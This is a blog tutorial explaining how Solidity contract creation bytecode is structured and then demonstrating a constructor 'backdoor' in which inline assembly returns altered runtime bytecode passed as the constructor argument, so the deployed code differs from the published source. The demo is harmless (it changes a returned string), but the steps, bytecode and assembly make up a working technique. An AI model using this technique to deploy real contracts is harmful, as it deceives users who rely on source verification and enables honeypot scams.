How to Exploit a Solidity Constructor

Written by inaeem | Published 2021/11/12

TL;DR: The simplest contract has a constructor with public visibility that doesn’t do anything. When we compile this contract, the Solidity compiler generates a string of seemingly gibberish characters (bytecode). The bytecode includes everything needed to deploy and initialize the code, persist state, and run some sanity checks. To create the contract on-chain, we send a transaction (RPC call) whose “to” address is null and whose “data” field carries that bytecode. The trailing Auxdata is a hash used for source verification; it is never meant for the EVM and isn't executed by the EVM.

Before we discuss the exploit, let’s quickly discuss how smart contracts are executed by the EVM. Let’s start with the simplest possible smart contract, which has a constructor with public visibility that doesn’t do anything.

// SPDX-License-Identifier: MIT

pragma solidity = 0.8.9;

contract Simple {
    constructor () public {}
}

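When we compile this contract, Solidity's compiler (solc) emits a seemingly gibberish hex string. This is the creation bytecode, which contains the init code, the runtime code, and the Auxdata. The exact bytes depend on the compiler version.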

// It will print the binary.
$ solc --bin Simple.sol
0x6080604052348015600f57600080fd5b50603580601d6000396000f3006080604052600080fd00
a165627a7a72305820a5212a0f267d8b353b5f25b37718d4894d57728a88e86f7079ffef9332d2be630029

How is a Contract Executed?

To create the contract on-chain, the web3 client makes an RPC call that sends a transaction like the one below. When the transaction executes, the EVM initializes the memory and stack and bootstraps the environment. It then loads the contract bytecode into its virtual ROM and executes it instruction by instruction. If an error occurs during execution, the EVM halts and reports the issue to the execution environment.

{
  "from": "0xbd04d16f09506e80d1fd1fd8d0c79afa49bd9976",
  "to": null,
  "gas": "68653", // 30400,
  "gasPrice": "1", // 10000000000000
  "data": "0x60606040523415600e57600080fd5b603580601b6000396000f3006060604052600080fd00a165627a7a723058204bf1accefb2526a5077bcdfeaeb8020162814272245a9741cc2fddd89191af1c0029"
}

where

“to” address is null to indicate a contract deployment.

“data” includes everything to successfully deploy/initialize the code, persist state and some sanity checks.
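As a rough sketch of what the client sends, the snippet below builds a JSON-RPC request for a contract creation. It only constructs the payload and never contacts a node. `eth_sendTransaction` is the standard JSON-RPC method; the helper name `build_deploy_request` and the hex-encoded gas values are assumptions made for illustration.

```python
import json

def build_deploy_request(sender: str, creation_bytecode: str, gas: int, gas_price: int) -> dict:
    """Build (but do not send) a JSON-RPC request that deploys a contract."""
    return {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "eth_sendTransaction",
        "params": [{
            "from": sender,
            "to": None,                  # serialized as null: marks a contract creation
            "gas": hex(gas),             # JSON-RPC quantities are hex strings
            "gasPrice": hex(gas_price),
            "data": creation_bytecode,   # init code + runtime code + auxdata
        }],
    }

# The "data" value from the transaction shown above, split into its three parts.
DATA = (
    "0x"
    "60606040523415600e57600080fd5b603580601b6000396000f300"  # init code
    "6060604052600080fd00"                                    # runtime logic
    "a165627a7a72305820"                                      # auxdata header
    "4bf1accefb2526a5077bcdfeaeb8020162814272245a9741cc2fddd89191af1c"
    "0029"                                                    # auxdata length
)

request = build_deploy_request(
    "0xbd04d16f09506e80d1fd1fd8d0c79afa49bd9976", DATA, gas=68653, gas_price=1
)
print(json.dumps(request, indent=2))
```

Whether a given node accepts `null` or expects the "to" key to be left out entirely may vary by client, so treat that detail as something to check against your own setup.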

What is that data bytecode? Let's dive into the data.

Init Code Fragments

The init code is responsible for bootstrapping and preparing a working environment for the contract. The Solidity compiler prepends this bootstrapping logic to the runtime bytecode.
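To make the split between init code and runtime code concrete, here is a minimal sketch that cuts the `solc --bin` output of the Simple contract in two. It assumes the old-style init-code tail (PUSH1 length, DUP1, PUSH1 offset, PUSH1 0, CODECOPY, PUSH1 0, RETURN); newer compilers may emit PUSH2 or a different sequence, so the pattern is illustrative only. The function name `split_creation_code` is hypothetical.

```python
import re

# Creation bytecode of the Simple contract, as printed earlier in the article.
CREATION = (
    "6080604052348015600f57600080fd5b50603580601d6000396000f300"
    "6080604052600080fd00"
    "a165627a7a72305820a5212a0f267d8b353b5f25b37718d4894d57728a88e86f7079ffef9332d2be630029"
)

# PUSH1 <len> DUP1 PUSH1 <off> PUSH1 00 CODECOPY PUSH1 00 RETURN
TAIL = re.compile(rb"\x60(.)\x80\x60(.)\x60\x00\x39\x60\x00\xf3", re.DOTALL)

def split_creation_code(creation_hex: str):
    """Return (init_code, runtime_code) based on the CODECOPY arguments."""
    if creation_hex.startswith("0x"):
        creation_hex = creation_hex[2:]
    code = bytes.fromhex(creation_hex)
    match = TAIL.search(code)
    if match is None:
        raise ValueError("init-code tail not recognised")
    length = match.group(1)[0]   # number of runtime bytes copied to memory
    offset = match.group(2)[0]   # where the runtime code starts in the creation code
    return code[:offset], code[offset:offset + length]

init_code, runtime_code = split_creation_code(CREATION)
print("init   :", init_code.hex())
print("runtime:", runtime_code.hex())
```

For this contract the init code copies 0x35 bytes starting at code offset 0x1d, so everything before that offset is bootstrapping logic and everything after it is what ends up on-chain.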

Parameters

A web3 transaction puts the constructor parameters at the end of the contract bytecode. The EVM uses CODECOPY to copy them into memory; from there the constructor can push them onto the stack and commit them to state storage.

Because the arguments are appended to the end of the creation bytecode, they are never meant to be executed by the EVM. It is a sort of hack for handing values to the constructor.
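The appended arguments follow the contract ABI encoding. As a minimal sketch for the single `bytes` argument used later in this article, the helper below (a hypothetical name, `encode_bytes_arg`) produces the three parts of that encoding: a 32-byte offset, a 32-byte length, and the data right-padded to a multiple of 32 bytes.

```python
def encode_bytes_arg(payload: bytes) -> bytes:
    """ABI-encode one dynamic `bytes` argument: offset word, length word, padded data."""
    offset = (32).to_bytes(32, "big")           # data section starts right after the head
    length = len(payload).to_bytes(32, "big")   # number of payload bytes
    padding = b"\x00" * (-len(payload) % 32)    # right-pad to a 32-byte boundary
    return offset + length + payload + padding

def deployment_data(creation_code: bytes, payload: bytes) -> bytes:
    """Creation bytecode followed by the encoded constructor argument."""
    return creation_code + encode_bytes_arg(payload)

args = encode_bytes_arg(bytes.fromhex("1414141414"))
for i in range(0, len(args), 32):
    print(args[i:i + 32].hex())
```

The three printed words are the offset (0x20), the length (5), and the payload followed by zero padding.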

Constructors

The code in the constructor is called exactly once, when the contract is created.

Constructors should be used for initializing state variables; long or complex Solidity code in them should generally be avoided.

Runtime ByteCode

The runtime bytecode doesn't contain the init logic or the constructor's input parameters; it represents only the core functionality of the contract that is stored on-chain. It also contains a routine that dispatches each call to the right function based on the function's selector.

A function selector is the first 4 bytes of the keccak256 hash of the function’s signature. The signature consists of the function name and its parameter types only; visibility and return types are not part of it.

bytes4(keccak256("test()"))
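To see the dispatch value computed end to end, here is a sketch that derives a selector with a small pure-Python Keccak-256. Python's `hashlib.sha3_256` uses different padding and does not produce Ethereum's keccak256, which is why the hash is written out here. The function names are illustrative, and this is meant for study rather than production use. The runtime bytecode dump later in this article contains `63b4ba349f` (PUSH4 b4ba349f), which should be the selector of `sing()`.

```python
MASK64 = (1 << 64) - 1

def _rol64(value: int, shift: int) -> int:
    shift %= 64
    return ((value << shift) | (value >> (64 - shift))) & MASK64

def _keccak_f1600(lanes: list) -> list:
    """Keccak-f[1600] permutation on 25 lanes, indexed as x + 5*y."""
    lfsr = 1
    for _ in range(24):
        # theta: mix each column parity into its neighbours
        c = [lanes[x] ^ lanes[x + 5] ^ lanes[x + 10] ^ lanes[x + 15] ^ lanes[x + 20]
             for x in range(5)]
        d = [c[(x + 4) % 5] ^ _rol64(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [lanes[i] ^ d[i % 5] for i in range(25)]
        # rho and pi: rotate each lane and move it to its new position
        x, y = 1, 0
        current = lanes[x + 5 * y]
        for t in range(24):
            x, y = y, (2 * x + 3 * y) % 5
            current, lanes[x + 5 * y] = lanes[x + 5 * y], _rol64(current, (t + 1) * (t + 2) // 2)
        # chi: non-linear step applied row by row
        for row in range(0, 25, 5):
            t5 = lanes[row:row + 5]
            for x in range(5):
                lanes[row + x] = t5[x] ^ (~t5[(x + 1) % 5] & t5[(x + 2) % 5])
        # iota: round constant generated by an LFSR
        for j in range(7):
            lfsr = ((lfsr << 1) ^ ((lfsr >> 7) * 0x71)) % 256
            if lfsr & 2:
                lanes[0] ^= 1 << ((1 << j) - 1)
    return lanes

def keccak256(data: bytes) -> bytes:
    """Original Keccak-256 (padding byte 0x01), as used by Ethereum."""
    rate = 136  # bytes absorbed per block
    msg = bytearray(data) + b"\x01"
    msg += b"\x00" * (-len(msg) % rate)
    msg[-1] |= 0x80
    lanes = [0] * 25
    for off in range(0, len(msg), rate):
        block = msg[off:off + rate]
        for i in range(rate // 8):
            lanes[i] ^= int.from_bytes(block[8 * i:8 * i + 8], "little")
        lanes = _keccak_f1600(lanes)
    return b"".join(lane.to_bytes(8, "little") for lane in lanes[:4])

def selector(signature: str) -> str:
    """First 4 bytes of keccak256 over the canonical signature, e.g. 'sing()'."""
    return "0x" + keccak256(signature.encode("ascii"))[:4].hex()

print(selector("sing()"))
```

Note that the input is the bare signature `sing()`; adding `public` or `returns (string memory)` would hash a different string and yield a different, useless value.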

Auxdata ByteCode (optional)

Auxdata is a hash of the contract's metadata, which in turn references the source code. It is used for source verification against a distributed storage system such as IPFS or Swarm. It was never designed for the EVM, nor is it executed by the EVM.

Applications such as Etherscan or the web3 wallet recognize Auxdata and know where to look for contract metadata for source verification.

So how can we read Auxdata? It follows the layout below.

0xa1 0x65 <storage system> '0' 0x58 0x20 <32 bytes storage system hash> 0x00 0x29

a165627a7a723058204bf1accefb2526a5077bcdfeaeb8020162814272245a9741cc2fddd89191af1c0029

a1              CBOR map with one entry (would read as LOG1 if taken for an opcode)
65              CBOR text string of 5 characters (would read as PUSH6)
62 7a 7a 72 30  'b' 'z' 'z' 'r' '0'
58 20           CBOR byte string of 0x20 = 32 bytes
4bf1...af1c     <32 bytes swarm storage system hash>
00 29           Length of the previous part in bytes (0x29 = 41)
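The layout above can be read mechanically. The following sketch decodes this older `bzzr0` trailer from the end of a bytecode string; it assumes exactly the single-entry form shown here and would need adjusting for the longer trailers that newer compilers emit. The function name `parse_legacy_auxdata` is made up for this example.

```python
def parse_legacy_auxdata(bytecode_hex: str) -> dict:
    """Decode the single-entry bzzr0-style Auxdata trailer at the end of a bytecode."""
    if bytecode_hex.startswith("0x"):
        bytecode_hex = bytecode_hex[2:]
    code = bytes.fromhex(bytecode_hex)
    cbor_len = int.from_bytes(code[-2:], "big")   # last two bytes: length of the CBOR part
    cbor = code[-2 - cbor_len:-2]
    if cbor[0] != 0xA1 or cbor[1] != 0x65:
        raise ValueError("expected a one-entry CBOR map with a 5-character key")
    key = cbor[2:7].decode("ascii")               # storage system tag, e.g. 'bzzr0'
    if cbor[7:9] != b"\x58\x20":
        raise ValueError("expected a 32-byte CBOR byte string")
    return {"storage": key, "hash": cbor[9:41].hex(), "length": cbor_len}

AUXDATA = (
    "a165627a7a72305820"
    "4bf1accefb2526a5077bcdfeaeb8020162814272245a9741cc2fddd89191af1c"
    "0029"
)
info = parse_legacy_auxdata(AUXDATA)
print(info["storage"], info["length"], info["hash"])
```

Because the length is stored in the last two bytes, the same function also works when it is given the full creation or runtime bytecode rather than the trailer alone.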

How Does the Exploit Work?

Whether you call it the Backdoor Technique or the Honeypot Hack, the idea here is to trick the EVM into loading a modified implementation of a contract during the contract creation phase.

We need to recall a few key concepts.

1- The actual representation of a contract is its “Runtime ByteCode”, which contains the dispatch routine, function body wrappers, function implementations, etc.

It is executed whenever someone or something interacts with the contract.

2- Some of the key events in the course of bootstrapping a contract are:

  • Copy a big chunk of the code to memory (CODECOPY).
  • Set up the memory layout in which the smart contract is stored.
  • Return the runtime code of the created contract, which is then stored in the state trie.
  • Stop executing the contract creation.

3- When a web3 client initiates a transaction (RPC call) to create a contract, it appends the constructor arguments to the end of the code as raw hex data.

4- Solidity supports inline assembly, which enables low-level operations (in an EVM dialect) that the Solidity language itself does not support or allow.

5- One low-level built-in operation is return, which quits the execution context (internal message call) and hands a memory range, given by its offset and size, back to the caller.

Now let’s discuss how this exploit works.

  • First, carefully prepare the Runtime ByteCode of an altered version of the contract.
  • Calculate the number of bytes in the altered bytecode.
  • Determine where in memory the target contract loads its constructor argument.
  • Load the altered bytecode into the target contract’s memory space as the constructor argument.
  • Instruct the EVM to ignore the compiled bytecode by using inline assembly to return the memory range of the modified bytecode as the contract's Runtime ByteCode.

Demonstrate It Please.

Consider a contract that is supposed to sing "It's a Wonderful World!" but may instead sing "The Times They Are a Changin!"

// SPDX-License-Identifier: MIT
pragma solidity = 0.8.9;

contract ContractA {
    constructor (bytes memory a) public {

        /*
           The values passed to the return opcode could come from complex logic,
           but to keep the demo simple we have hard-coded them.
           They may be different in your case.
        */

        assembly{
            return (0xc0, 0x17c)
        }
    }

    function sing() public returns (string memory) {
        return "It's a Wonderful World!";
    }
}

Step #1: Prepare An Altered Runtime ByteCode

Implement a slightly different version of "ContractA."

// SPDX-License-Identifier: MIT
pragma solidity = 0.8.9;

contract AlteredContractA {    
    function sing() public returns (string memory) {
        return "The Times They Are a Changin!";
    }
} 

Deploy the contract using Remix first, then debug the transaction to observe what is loaded into memory at the RETURN instruction (030 RETURN in the debugger). Now copy the hex values that correspond to the runtime bytecode.

/*
608060405234801561001057600080fd5b50600436106100
2b5760003560e01c8063b4ba349f14610030575b600080fd
5b61003861004e565b6040516100459190610124565b6040
5180910390f35b60606040518060400160405280601d8152
6020017f5468652054696d65732054686579204172652061
204368616e67696e21000000815250905090565b60008151
9050919050565b600082825260208201905092915050565b
60005b838110156100c55780820151818401526020810190
506100aa565b838111156100d4576000848401525b505050
50565b6000601f19601f8301169050919050565b60006100
f68261008b565b6101008185610096565b93506101108185
602086016100a7565b610119816100da565b840191505092
915050565b6000602082019050818103600083015261013e
81846100eb565b90509291505056fea26469706673582212
206f52e317773c0063a5888d204277821aaf1a0ef4c6baac
8a6ec76ef3673e589a64736f6c6343000809003300000000
*/

Step #2: Determine The Length Of Runtime ByteCode

We are interested in the Stack section at the RETURN instruction (030 RETURN) because its top two entries describe the memory range that holds the runtime bytecode.

First Index: Lower bound (offset) of the memory range.

Second Index: Length of the runtime bytecode (0x17c).
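As a quick sanity check on that length, the sketch below measures the hex dump from Step #1. The dump is 384 bytes long, while the debugger reports 0x17c = 380; the four trailing zero bytes are consistent with padding up to a 32-byte boundary, though that reading is an assumption about how the dump was captured.

```python
# Hex dump copied from Step #1 (memory contents observed in the debugger).
DUMP = (
    "608060405234801561001057600080fd5b50600436106100"
    "2b5760003560e01c8063b4ba349f14610030575b600080fd"
    "5b61003861004e565b6040516100459190610124565b6040"
    "5180910390f35b60606040518060400160405280601d8152"
    "6020017f5468652054696d65732054686579204172652061"
    "204368616e67696e21000000815250905090565b60008151"
    "9050919050565b600082825260208201905092915050565b"
    "60005b838110156100c55780820151818401526020810190"
    "506100aa565b838111156100d4576000848401525b505050"
    "50565b6000601f19601f8301169050919050565b60006100"
    "f68261008b565b6101008185610096565b93506101108185"
    "602086016100a7565b610119816100da565b840191505092"
    "915050565b6000602082019050818103600083015261013e"
    "81846100eb565b90509291505056fea26469706673582212"
    "206f52e317773c0063a5888d204277821aaf1a0ef4c6baac"
    "8a6ec76ef3673e589a64736f6c6343000809003300000000"
)

RETURN_SIZE = 0x17C  # second stack entry at RETURN, as read from the debugger

raw = bytes.fromhex(DUMP)
runtime, padding = raw[:RETURN_SIZE], raw[RETURN_SIZE:]

print("dump bytes    :", len(raw))
print("runtime bytes :", len(runtime))
print("padding       :", padding.hex())
# The runtime code ends with a 2-byte length of its metadata trailer.
print("trailer length:", int.from_bytes(runtime[-2:], "big"))
```

The last two bytes of the 380-byte runtime code give the size of the metadata trailer, which is a handy cross-check that the cut at 0x17c lands on the true end of the bytecode.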

Step #3: Deploy The Target Contract

Debug the transaction after deploying the target contract "ContractA" with an arbitrary parameter 0x1414141414.

// SPDX-License-Identifier: MIT
pragma solidity = 0.8.9;

contract ContractA {
    constructor (bytes memory a) public {
    }
    
    function sing() public returns (string memory) {
        return "It's a Wonderful World!";
    }
} 

The EVM will load the parameter into memory at some point during the bootstrapping process. We must keep track of where it is loaded into memory.

It's at 0xc0 in our case.
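One plausible way to account for 0xc0 is sketched below as a toy memory model. It assumes the init code copies the ABI-encoded argument to Solidity's initial free-memory pointer at 0x80, so the offset word sits at 0x80, the length word at 0xa0, and the payload at 0xc0. This is a simplification, not a trace of the real init code, and the addresses should always be confirmed in the debugger. All names here are hypothetical.

```python
FREE_MEMORY_START = 0x80  # assumption: Solidity's initial free-memory pointer

def model_constructor_memory(payload: bytes) -> bytearray:
    """Toy model of memory after the encoded `bytes` argument is copied to 0x80."""
    encoded = (
        (32).to_bytes(32, "big")             # offset word, stored at 0x80
        + len(payload).to_bytes(32, "big")   # length word, stored at 0xa0
        + payload                            # payload, starting at 0xc0
        + b"\x00" * (-len(payload) % 32)     # zero padding to a 32-byte boundary
    )
    return bytearray(FREE_MEMORY_START) + encoded

def evm_return(memory: bytearray, offset: int, size: int) -> bytes:
    """Mimic RETURN(offset, size): during creation these bytes become the runtime code."""
    return bytes(memory[offset:offset + size])

payload = bytes.fromhex("1414141414")
memory = model_constructor_memory(payload)

data_offset = FREE_MEMORY_START + 32 + 32
print(hex(data_offset))  # 0xc0

deployed = evm_return(memory, data_offset, len(payload))
print(deployed.hex())
```

In this model, returning `(0xc0, len(payload))` from the constructor hands back exactly the bytes that were passed in as the argument, which is the heart of the trick.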

Now, add some inline assembly code to the constructor that returns:

  • 0xc0 as the lower bound.
  • 0x17c as the length of the runtime bytecode.

// SPDX-License-Identifier: MIT
pragma solidity = 0.8.9;

contract ContractA {
    constructor (bytes memory a) public {
        assembly{
            return (0xc0, 0x17c)
        }
    }
    
    function sing() public returns (string memory) {
        return "It's a Wonderful World!";
    }
} 

Step #4: Re-Deploy The Target Contract

Now, re-deploy ContractA with the following modifications.

  • Inline assembly that returns the specified memory region (0xc0, 0x17c) as the runtime bytecode.
  • The altered runtime bytecode from Step #1, passed as the argument to the constructor.
0x608060405234801561001057600080fd5b50600436106100
2b5760003560e01c8063b4ba349f14610030575b600080fd
5b61003861004e565b6040516100459190610124565b6040
5180910390f35b60606040518060400160405280601d8152
6020017f5468652054696d65732054686579204172652061
204368616e67696e21000000815250905090565b60008151
9050919050565b600082825260208201905092915050565b
60005b838110156100c55780820151818401526020810190
506100aa565b838111156100d4576000848401525b505050
50565b6000601f19601f8301169050919050565b60006100
f68261008b565b6101008185610096565b93506101108185
602086016100a7565b610119816100da565b840191505092
915050565b6000602082019050818103600083015261013e
81846100eb565b90509291505056fea26469706673582212
206f52e317773c0063a5888d204277821aaf1a0ef4c6baac
8a6ec76ef3673e589a64736f6c6343000809003300000000

Step #5: Invoke Sing Of The Target Contract

When you invoke sing() on the target contract, you will hear it sing "The Times They Are a Changin!"

{
	"0": "string: The Times They Are a Changin!"
}


Written by inaeem | live @ PID 1
Published by HackerNoon on 2021/11/12